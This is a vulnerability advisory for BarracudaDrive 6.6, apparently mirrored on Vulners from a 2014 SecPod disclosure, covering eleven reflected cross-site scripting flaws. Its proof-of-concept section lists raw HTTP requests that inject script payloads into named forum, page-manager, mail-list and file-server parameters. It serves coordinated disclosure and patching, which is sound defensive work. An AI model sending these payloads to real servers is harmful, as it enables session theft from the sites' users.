Vulners
Lucene search
BarracudaDrive 6.6 Cross Site Scripting
🗓️ 18 Mar 2014 00:00:00Reported by Prabhu S AngadiType 
packetstorm🔗 packetstormsecurity.com👁 35 Views
`##############################################################################
#
# Title : BarracudaDrive Multiple XSS Vulnerabilities
# Author : Prabhu S Angadi SecPod Technologies Pvt. Ltd. http://www.secpod.com
# Vendor : http://barracudadrive.com
# Advisory : http://secpod.org/blog/?p=2158
# http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt
# Software : BarracudaDrive 6.6
# Date : 24/02/2014
#
##############################################################################
SecPod ID: 1049 24/02/2014 Issue Discovered
07/03/2014 Vendor Notified
07/03/2014 Vendor Responded
13/03/2014 Vendor Solution
17/03/2014 Advisory Released
Class: Cross-Site Scripting Severity: Medium
Overview:
---------
BarracudaDrive Multiple Reflected Cross-site Scripting Vulnerabilities.
Technical Description:
----------------------
Multiple Reflected Cross-Site Scripting vulnerabilities are present in
BarracudaDrive, as it fails to properly sanitize user-supplied input.
1) Input passed via the 'sForumName', 'sDescription' parameters in
'/Forum/manage/ForumManager.lsp?nForumId=1' are not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
2) Input passed via the 'sHint', 'sWord' parameters in
'/Forum/manage/hangman.lsp?nId=1' are not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
3) Input passed via the 'nId' parameter in '/Forum/manage/hangman.lsp' are
not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.
4) Input passed via the 'sForumName', 'sDescription' parameters in
'/Forum/manage/ForumManager.lsp?newforum=true' are not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
5) Input passed via the 'user' parameter in
'/rtl/protected/admin/wizard/setuser.lsp' are not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
6) Input passed via the 'name', 'email' parameter in '/feedback.lsp'
are not properly verified before it is returned to the user.
This can be exploited to execute arbitrary HTML and script code in a
user's browser session through '/private/manage/messages.lsp' or
'/private/manage/messages.lsp?key=1' URIs in the context of a
vulnerable site.
7) Input passed via the 'lname', 'url' parameters in
'/private/manage/PageManager.lsp?parent=0&newpage=true' are not properly
verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
8) Input passed via the 'lname', 'url' parameters in
'/private/manage/PageManager.lsp?parent=0&edit=9' are not properly
verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.
9) Input passed via the 'cmd' parameter in '/fs' is not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
10) Input passed via the 'newname', 'description' parameters in
'/rtl/protected/mail/manage/list.lsp' are not properly verified before
it is returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
11) Input passed via the 'firstname', 'lastname', 'id' parameters in
'/rtl/protected/mail/manage/list.lsp?name=test' are not properly verified
before it is returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of a vulnerable site.
The vulnerability has been tested in BarracudaDrive 6.6. Other versions may
also be affected.
Impact:
--------
Successful exploitation allows an authenticated attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.
Affected Software:
------------------
BarracudaDrive 6.6
Tested on,
BarracudaDrive 6.6 on Windows OS
BarracudaDrive 6.6 on Linux OS
References:
-----------
http://secpod.org/blog/?p=2158
http://secpod.org/advisories/SecPod_BarracudaDrive_Mult_XSS_Vuln.txt
Proof of Concept:
----------------
1) POST /Forum/manage/ForumManager.lsp?nForumId=1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/Forum/manage/ForumManager.lsp?nForumId=1
Cookie: z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Post Data :
==========
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=1
2) POST /Forum/manage/hangman.lsp?nId=1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/Forum/manage/hangman.lsp?nId=1
Cookie: z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135
Post Data :
===========
sHint=<script>alert(document.cookie)</script>&sWord=<script>alert(document.cookie)</script>&save=Save&nId=1
3) GET /Forum/manage/hangman.lsp?nId=<script>alert(document.cookie)</script>
(With atleast single entry in the table of Word Manager)
4) POST /Forum/manage/ForumManager.lsp?newforum=true
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/Forum/manage/ForumManager.lsp?newforum=true
Cookie: z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Post Data :
==========
nSortOrder=0&sForumName=<script>alert(document.cookie)</script>&sDescription=<script>alert(document.cookie)</script>&deleteforum=no&nForumId=-1
5) POST /rtl/protected/admin/wizard/setuser.lsp
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp
Cookie: z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
Post Data :
==========
user=<script>alert(document.cookie)</script>&password=test&path=/c/bdusers
6) POST /feedback.lsp
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/Contact-Us.html
Cookie: z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Post Data :
==========
name=<script>alert(document.cookie)</script>&email=<script>alert(document.cookie)</script>&message=test&k1=1393176261&k2=652054939&ck1=JBxYStg2gm3CuvlMdKlxsA==&ck2=JxxfTNM1hm7Nu/YxAAAAAA==
Effect will on:
/private/manage/messages.lsp
/private/manage/messages.lsp?key=1
7) POST /private/manage/PageManager.lsp?parent=0&newpage=true
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&newpage=true
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
Post Data :
==========
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&deletepage=no&parent=0&key=-1
8) POST /private/manage/PageManager.lsp?parent=0&edit=9
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/PageManager.lsp?parent=0&edit=9
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 174
Post Data :
===========
position=0&lname=<script>alert(document.cookie)</script>&url=<script>alert(document.cookie)</script>&cancel=Cancel&deletepage=no&parent=0&key=9
Effects will be on: /private/manage/PageManager.lsp
9) GET /fs/?cmd=<script>alert(document.cookie)</script>
10) POST /rtl/protected/mail/manage/list.lsp
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/mail/manage/list.lsp
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Post Data :
===========
newname=<script>alert(document.cookie)</script>&description=<script>alert(document.cookie)</script>&save=Create+New+List
Effect will be on '/rtl/protected/mail/manage/lists.lsp'
11) POST /rtl/protected/mail/manage/list.lsp?name=test
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/mail/manage/list.lsp?name=test
Cookie: tzone=--330; z9ZAqJtI=714dd7c0530d8b06
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 259
Post Data :
==========
listkey=2&[email protected]&firstname=<script>alert(document.cookie)</script>&lastname=<script>alert(document.cookie)</script>&id=<script>alert(document.cookie)</script>&addsub=save&name=test&offset=0&save=Save
12) GET /fs/<script>alert(document.cookie)</script>
Solution:
----------
Upgrade to BarracudaDrive 6.7
Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = SINGLE INSTANCE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)
CVSS Temporal Score = 3.1
Risk factor = Medium
Credits:
--------
Author Prabhu S Angadi of SecPod Technologies has been credited with the
discovery of this vulnerability.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Mar 2014 00:00Current
7.4High risk
Vulners AI Score7.4